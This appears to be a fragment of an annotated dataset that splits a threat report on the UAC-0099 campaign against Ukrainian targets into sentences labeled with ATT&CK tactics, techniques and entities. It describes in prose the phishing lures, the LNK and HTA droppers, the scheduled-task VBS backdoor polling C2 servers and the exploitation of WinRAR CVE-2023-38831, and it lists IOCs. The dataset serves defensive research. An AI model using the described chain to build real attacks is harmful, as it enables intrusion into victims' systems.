working remotely for a company outside of the Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Send a phishing email impersonating a legitimate entity to a corporate email account.", "entities": [ { "text": "UAC-0099", "start": 52, "end": 60, "label": "ThreatActor" }, { "text": "sent an email impersonating the Lviv city court using the ukr.net", "start": 62, "end": 127, "label": "Action" }, { "text": "ukr.net", "start": 120, "end": 127, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p2-s7-be164e", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 2, "sentence_id": 7, "context_before": "RAR SFX with LNK Infection Vector In early August, “UAC-0099” sent an email impersonating the Lviv city court using the ukr.net The email was sent to a corporate email box of a Ukrainian employee working remotely for a company outside of the Ukraine.", "sentence_text": "The attached is an executable file created by WinRAR, the Windows-based file archiver and compression utility that can compress a file as a self-extracting archive (SFX):\n2/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p3-s8-f033ce", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 3, "sentence_id": 8, "context_before": "The attached is an executable file created by WinRAR, the Windows-based file archiver and compression utility that can compress a file as a self-extracting archive (SFX):\n2/11", "sentence_text": "After extracting the contents of the archive, a new file is created with a double extension, in this case docx.lnk:\nThe file looks like a regular document file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.007", "name": "Masquerading: Double File Extension" } ], "procedure": "A file is created with a double extension to appear as a legitimate document.", "entities": [ { "text": "a new file is created with a double extension", "start": 46, "end": 91, "label": "Action" } ] }, { "uid": "aptnotes-05_aptnotes_report-p3-s9-008c3f", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 3, "sentence_id": 9, "context_before": "After extracting the contents of the archive, a new file is created with a double extension, in this case docx.lnk:\nThe file looks like a regular document file.", "sentence_text": "However, it’s a LNK shortcut disguised as a DOCX file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p3-s10-2af796", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 3, "sentence_id": 10, "context_before": "However, it’s a LNK shortcut disguised as a DOCX file.", "sentence_text": "Closer inspection reveals that the file uses the “WordPad” application icon instead of a DOCX icon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p3-s11-e72f2f", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 3, "sentence_id": 11, "context_before": "Closer inspection reveals that the file uses the “WordPad” application icon instead of a DOCX icon.", "sentence_text": "When opened, the specially crafted LNK file executes PowerShell with malicious content:\n3/11", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" }, { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Execute PowerShell with malicious content via a crafted LNK file.", "entities": [ { "text": "executes PowerShell with malicious content", "start": 44, "end": 86, "label": "Action" }, { "text": "LNK file", "start": 35, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "PowerShell", "start": 53, "end": 63, "label": "MalwareTool" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s12-f3fab9", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 12, "context_before": "When opened, the specially crafted LNK file executes PowerShell with malicious content:\n3/11", "sentence_text": "The malicious PowerShell code decodes two base64 blobs and writes the output into VBS and DOCX files.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Decode base64 blobs and write the resulting content into VBS and DOCX files.", "entities": [ { "text": "decodes two base64 blobs", "start": 30, "end": 54, "label": "Action" }, { "text": "writes the output into VBS and DOCX files", "start": 59, "end": 100, "label": "Action" }, { "text": "VBS", "start": 82, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "DOCX", "start": 90, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s13-b5a983", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 13, "context_before": "The malicious PowerShell code decodes two base64 blobs and writes the output into VBS and DOCX files.", "sentence_text": "After that, the PowerShell code opens the DOCX file as a decoy while also creating a new scheduled task that executes the VBS file every three minutes.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1053.005", "name": "Scheduled Task" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Open a DOCX file as a decoy and create a scheduled task to execute a VBS file periodically.", "entities": [ { "text": "opens the DOCX file as a decoy", "start": 32, "end": 62, "label": "Action" }, { "text": "creating a new scheduled task", "start": 74, "end": 103, "label": "Action" }, { "text": "executes the VBS file every three minutes", "start": 109, "end": 150, "label": "Action" }, { "text": "DOCX file", "start": 42, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "VBS file", "start": 122, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s14-4c45f6", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 14, "context_before": "After that, the PowerShell code opens the DOCX file as a decoy while also creating a new scheduled task that executes the VBS file every three minutes.", "sentence_text": "The VBS malware was named “LonePage” by CERT-UA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p4-s15-53178d", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 15, "context_before": "The VBS malware was named “LonePage” by CERT-UA.", "sentence_text": "When executed, it creates a hidden PowerShell process that communicates with a hardcoded C2 URL to fetch a text file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Create a hidden PowerShell process that communicates with a C2 URL to fetch a text file.", "entities": [ { "text": "creates a hidden PowerShell process", "start": 18, "end": 53, "label": "Action" }, { "text": "communicates with a hardcoded C2 URL", "start": 59, "end": 95, "label": "Action" }, { "text": "fetch a text file", "start": 99, "end": 116, "label": "Action" }, { "text": "C2 URL", "start": 89, "end": 95, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s16-90868d", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 16, "context_before": "When executed, it creates a hidden PowerShell process that communicates with a hardcoded C2 URL to fetch a text file.", "sentence_text": "The rest of the PowerShell code is executed only if the response from the C2 is greater than one byte.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "The malware conditionally executes PowerShell code based on a response received from the C2 server.", "entities": [ { "text": "executed", "start": 35, "end": 43, "label": "Action" }, { "text": "response from the C2", "start": 56, "end": 76, "label": "Action" }, { "text": "C2", "start": 74, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s17-169dc6", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 17, "context_before": "The rest of the PowerShell code is executed only if the response from the C2 is greater than one byte.", "sentence_text": "In that instance, the PowerShell script checks to see if the string “get-content“ is included in the text file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The PowerShell script checks whether a specific command string is present in the retrieved text file.", "entities": [ { "text": "checks to see if the string “get-content“ is included in the text file", "start": 40, "end": 110, "label": "Action" }, { "text": "PowerShell script", "start": 22, "end": 39, "label": "MalwareTool" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s18-10c742", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 18, "context_before": "In that instance, the PowerShell script checks to see if the string “get-content“ is included in the text file.", "sentence_text": "If the string is present, then the script executes the code from the server and saves it as an array of bytes.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute code from a remote server and save it as an array of bytes.", "entities": [ { "text": "executes the code from the server", "start": 42, "end": 75, "label": "Action" }, { "text": "saves it as an array of bytes", "start": 80, "end": 109, "label": "Action" }, { "text": "the server", "start": 65, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s19-74de5e", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 19, "context_before": "If the string is present, then the script executes the code from the server and saves it as an array of bytes.", "sentence_text": "If the string is absent, the script executes a combination of commands inside the text file from the server and some hard-coded basic enumeration commands such as “whoami:”", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1033", "name": "System Owner/User Discovery" } ], "procedure": "Execute commands from a server-hosted text file and perform enumeration using commands such as whoami.", "entities": [ { "text": "executes a combination of commands inside the text file from the server and some hard-coded basic enumeration commands such as “whoami:”", "start": 36, "end": 172, "label": "Action" }, { "text": "the server", "start": 97, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s20-252622", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 20, "context_before": "If the string is absent, the script executes a combination of commands inside the text file from the server and some hard-coded basic enumeration commands such as “whoami:”", "sentence_text": "Regardless of the C2 response, the results of executing the commands inside the txt file or the hardcoded commands are sent back to the same C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Send execution results back to the C2 server.", "entities": [ { "text": "the results of executing the commands inside the txt file or the hardcoded commands are sent back to the same C2 server", "start": 31, "end": 150, "label": "Action" }, { "text": "C2 server", "start": 141, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p4-s21-5fae10", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 21, "context_before": "Regardless of the C2 response, the results of executing the commands inside the txt file or the hardcoded commands are sent back to the same C2 server.", "sentence_text": "However, it is sent to a different port via HTTP POST method.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p4-s22-8b45b6", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 4, "sentence_id": 22, "context_before": "However, it is sent to a different port via HTTP POST method.", "sentence_text": "The DOCX document is a decoy to trick the victim into thinking they’re opening a legitimate DOCX file containing a court summons instead of a malicious file:\n4/11", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "A decoy document is used to trick the victim into opening a malicious file disguised as a legitimate document.", "entities": [ { "text": "to trick the victim into thinking they’re opening a legitimate DOCX file", "start": 29, "end": 101, "label": "Action" } ] }, { "uid": "aptnotes-05_aptnotes_report-p5-s23-6d3296", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 5, "sentence_id": 23, "context_before": "The DOCX document is a decoy to trick the victim into thinking they’re opening a legitimate DOCX file containing a court summons instead of a malicious file:\n4/11", "sentence_text": "In early November, another instance of this campaign was observed using a different C2 address — 196.196.156[.]2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p5-s24-5a771d", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 5, "sentence_id": 24, "context_before": "In early November, another instance of this campaign was observed using a different C2 address — 196.196.156[.]2.", "sentence_text": "Since the threat actor controls the content of the “upgrade.txt” files, they can change it according to their objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p5-s25-2824e0", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 5, "sentence_id": 25, "context_before": "Since the threat actor controls the content of the “upgrade.txt” files, they can change it according to their objectives.", "sentence_text": "As such, the content is not always the same and can vary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p5-s26-325777", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 5, "sentence_id": 26, "context_before": "As such, the content is not always the same and can vary.", "sentence_text": "The following code was observed as a response from the C2 server at 2023-11-08 14:50:30 UTC.\n5/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p6-s27-10555e", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 6, "sentence_id": 27, "context_before": "The following code was observed as a response from the C2 server at 2023-11-08 14:50:30 UTC.\n5/11", "sentence_text": "This PowerShell code is responsible for taking a screenshot.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p6-s28-e47c46", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 6, "sentence_id": 28, "context_before": "This PowerShell code is responsible for taking a screenshot.", "sentence_text": "As mentioned above, the LonePage VBS sends the results back to the C2, allowing the threat actor to execute any PowerShell code on the infected computer and receive the response back.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Use LonePage VBS to send results to a C2 server and execute PowerShell commands on the infected host while receiving responses.", "entities": [ { "text": "LonePage VBS", "start": 24, "end": 36, "label": "MalwareTool" }, { "text": "sends the results back to the C2", "start": 37, "end": 69, "label": "Action" }, { "text": "execute any PowerShell code", "start": 100, "end": 127, "label": "Action" }, { "text": "PowerShell", "start": 112, "end": 122, "label": "MalwareTool" }, { "text": "receive the response back", "start": 157, "end": 182, "label": "Action" } ] }, { "uid": "aptnotes-05_aptnotes_report-p6-s29-61f27d", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 6, "sentence_id": 29, "context_before": "As mentioned above, the LonePage VBS sends the results back to the C2, allowing the threat actor to execute any PowerShell code on the infected computer and receive the response back.", "sentence_text": "At the end of November 2023, another campaign instance was observed using the C2 address 2.59.222[.]98.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p6-s30-96e756", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 6, "sentence_id": 30, "context_before": "At the end of November 2023, another campaign instance was observed using the C2 address 2.59.222[.]98.", "sentence_text": "In this case, the payload response from the C2 server aligns with what was described as “recon” activity in the pastebin:\nThe decoy document is a PDF file instead of a DOCX.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p6-s31-ba1407", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 6, "sentence_id": 31, "context_before": "In this case, the payload response from the C2 server aligns with what was described as “recon” activity in the pastebin:\nThe decoy document is a PDF file instead of a DOCX.", "sentence_text": "And instead of the usual court summons document, the PDF file shows a smudged document:\n6/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p7-s32-68a771", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 7, "sentence_id": 32, "context_before": "And instead of the usual court summons document, the PDF file shows a smudged document:\n6/11", "sentence_text": "HTA Infection Vector", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p7-s33-13ccc8", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 7, "sentence_id": 33, "context_before": "HTA Infection Vector", "sentence_text": "In contrast to the LNK attack vector described earlier, this attack uses HTA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p7-s34-146464", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 7, "sentence_id": 34, "context_before": "In contrast to the LNK attack vector described earlier, this attack uses HTA.", "sentence_text": "The HTA method is similar, but there are notable differences.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p7-s35-e40c39", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 7, "sentence_id": 35, "context_before": "The HTA method is similar, but there are notable differences.", "sentence_text": "Instead of an LNK file invoking PowerShell, the HTA file includes HTML code that contains a VBScript that executes PowerShell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" } ], "procedure": "The VBScript executes PowerShell code.", "entities": [ { "text": "executes PowerShell", "start": 106, "end": 125, "label": "Action" }, { "text": "PowerShell", "start": 115, "end": 125, "label": "MalwareTool" } ] }, { "uid": "aptnotes-05_aptnotes_report-p7-s36-ef80cb", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 7, "sentence_id": 36, "context_before": "Instead of an LNK file invoking PowerShell, the HTA file includes HTML code that contains a VBScript that executes PowerShell.", "sentence_text": "The scheduled task cadence is also different — it runs every four minutes instead of three in the previous cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p8-s37-d1c894", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 37, "context_before": "The scheduled task cadence is also different — it runs every four minutes instead of three in the previous cases.", "sentence_text": "CVE-2023-38831 Infection Vector", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p8-s38-567e9e", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 38, "context_before": "CVE-2023-38831 Infection Vector", "sentence_text": "In both attacks described below, “UAC-0099” exploited a known WinRAR vulnerability, identified by Group-IB and traced back to April 2023.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploit a known WinRAR vulnerability (CVE-2023-38831) to gain initial access to the target system.", "entities": [ { "text": "UAC-0099", "start": 34, "end": 42, "label": "ThreatActor" }, { "text": "exploited a known WinRAR vulnerability", "start": 44, "end": 82, "label": "Action" }, { "text": "WinRAR", "start": 62, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p8-s39-c025f4", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 39, "context_before": "In both attacks described below, “UAC-0099” exploited a known WinRAR vulnerability, identified by Group-IB and traced back to April 2023.", "sentence_text": "The vulnerability stems from how WinRAR processes ZIP files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p8-s40-6400af", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 40, "context_before": "The vulnerability stems from how WinRAR processes ZIP files.", "sentence_text": "The exploitation requires a user to interact with a specially crafted ZIP archive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p8-s41-7237e4", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 41, "context_before": "The exploitation requires a user to interact with a specially crafted ZIP archive.", "sentence_text": "Here’s how it works: the attacker creates an archive with a benign filename with a space after the file extension — for example, “poc.pdf .”", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Create a specially crafted archive with a deceptive filename containing a trailing space to facilitate exploitation.", "entities": [ { "text": "attacker creates an archive", "start": 25, "end": 52, "label": "Action" }, { "text": "archive", "start": 45, "end": 52, "label": "MalwareTool" }, { "text": "benign filename", "start": 60, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-05_aptnotes_report-p8-s42-4ff5ed", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 42, "context_before": "Here’s how it works: the attacker creates an archive with a benign filename...", "sentence_text": "When a user opens a ZIP file containing these files in an unpatched version of WinRAR and double-clicks on the benign file, the file with the “cmd” extension is executed instead.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The malicious file with a cmd extension is executed when the user interacts with the archive.", "entities": [ { "text": "is executed", "start": 158, "end": 169, "label": "Action" } ] }, { "uid": "aptnotes-05_aptnotes_report-p8-s43-ec627e", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 43, "context_before": "When a user opens a ZIP file containing these files in an unpatched version of WinRAR and double-clicks on the benign file, the file with the “cmd” extension is executed instead.", "sentence_text": "The vulnerability might produce higher infection rates because the attacks are disguised so well; even security-savvy victims can fall for the deception.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p8-s44-6b1865", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 44, "context_before": "The vulnerability might produce higher infection rates because the attacks are disguised so well; even security-savvy victims can fall for the deception.", "sentence_text": "Expecting to open a benign file, the user will inadvertently execute malicious code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p8-s45-2e0893", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 8, "sentence_id": 45, "context_before": "Expecting to open a benign file, the user will inadvertently execute malicious code.", "sentence_text": "You can find a POC for the vulnerability in GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s46-f11c4f", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 46, "context_before": "You can find a POC for the vulnerability in GitHub.", "sentence_text": "The malicious “cmd” file is different in the two files, each containing a different C2 URI path.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s47-1f9fb5", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 47, "context_before": "The malicious “cmd” file is different in the two files, each containing a different C2 URI path.", "sentence_text": "This, combined with the fact that UAC-0099 started to exploit the vulnerability several days after the patch, shows the level of sophistication of the attackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s48-999c46", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 48, "context_before": "This, combined with the fact that UAC-0099 started to exploit the vulnerability several days after the patch, shows the level of sophistication of the attackers.", "sentence_text": "While Google TAG identified several Russian threat actors using the vulnerability to attack Ukrainian targets, the UAC-0099 activity is absent in their blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s49-70841a", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 49, "context_before": "While Google TAG identified several Russian threat actors using the vulnerability to attack Ukrainian targets, the UAC-0099 activity is absent in their blog.", "sentence_text": "The CVE assignment and the Group-IB blog about the vulnerability were published after “UAC-0099” leveraged the attack technique, indicating they likely knew how to exploit it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s50-01ffaa", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 50, "context_before": "The CVE assignment and the Group-IB blog about the vulnerability were published after “UAC-0099” leveraged the attack technique, indicating they likely knew how to exploit it.", "sentence_text": "The decoy used in this campaign was once again the “summon to court” document theme.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s51-7efe3a", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 51, "context_before": "The decoy used in this campaign was once again the “summon to court” document theme.", "sentence_text": "Conclusions and Recommendations The tactics used by “UAC-0099” are simple, yet effective.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s52-e86fe1", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 52, "context_before": "Conclusions and Recommendations The tactics used by “UAC-0099” are simple, yet effective.", "sentence_text": "Despite the different initial infection vectors, the core infection is the same — they rely on PowerShell and the creation of a scheduled task that executes a VBS file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s53-d0b0e4", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 53, "context_before": "Despite the different initial infection vectors, the core infection is the same — they rely on PowerShell and the creation of a scheduled task that executes a VBS file.", "sentence_text": "Monitoring and limiting the functionality of those components can reduce the risk of “UAC- 0099” attacks — and/or identify them quickly in the event of compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s54-f1ba2d", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 54, "context_before": "Monitoring and limiting the functionality of those components can reduce the risk of “UAC- 0099” attacks — and/or identify them quickly in the event of compromise.", "sentence_text": "The WinRAR exploitation is an interesting choice.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s55-6e153c", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 55, "context_before": "The WinRAR exploitation is an interesting choice.", "sentence_text": "Some people don’t update their software in a timely fashion, even with automatic updates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s56-43f981", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 56, "context_before": "Some people don’t update their software in a timely fashion, even with automatic updates.", "sentence_text": "Please make sure you have the latest version of WinRAR installed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p9-s57-d41005", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 9, "sentence_id": 57, "context_before": "Please make sure you have the latest version of WinRAR installed.", "sentence_text": "IOCs and the POC for the CVE-2023-38831 can be found on our GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p10-s58-5df32a", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 10, "sentence_id": 58, "context_before": "IOCs and the POC for the CVE-2023-38831 can be found on our GitHub.", "sentence_text": "SHA256SHA256 DescriptioDescriptio\nd21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6 SFX\n0eec5a7373b28a991831d9be1e30976ceb057e5b701e732372524f1a50255c7 LNK\n8aca535047a3a38a57f80a64d9282ace7a33c54336cd08662409352c23507602 VBS\n2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed Decoy\n659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd SFX\n0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51 LNK\n4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924 VBS\n53812d7bdaf5e8e5c1b99b4b9f3d8d3d7726d4c6c23a72fb109132d96ca725c2 Decoy\n38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9 HTA\na10209c10bf373ed682a13dad4ff3aea95f0fdcd48b62168c6441a1c9f06be37 VBS\n61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1 Decoy\n86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a SFX\n762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378 LNK\n39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe VBS\nf75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e Decoy\n986694cad425c8f566e4e12c104811d4e8b30ce6c4c4d38f919b617b1aa66b05 CVE-2023\n38831 ZIP\n54458ebfbe56bc932e75d6d0a5c1222286218a8ef26face40f2a0c0ec2517584 CVE\nPayload\n96ab977f8763762af26bad2b6c501185b25916775b4ed2d18ad66b4c38bd5f0d VBS\n6a638569f831990df48669ca81fec37c6da380dbaaa6432d4407985e809810da Decoy\n87291b918218e01cac58ea55472d809d8cdd79266c372aebe9ee593c0f4e3b77 CVE-2023\n38831 ZIP\nf5f269cf469bf9c9703fe0903cda100acbb4b3e13dbfef6b6ee87a907e5fcd1b CVE\nPayload\ne34fc4910458e9378ea357baf045e9c0c21515a0b8818a5b36daceb2af464ea0 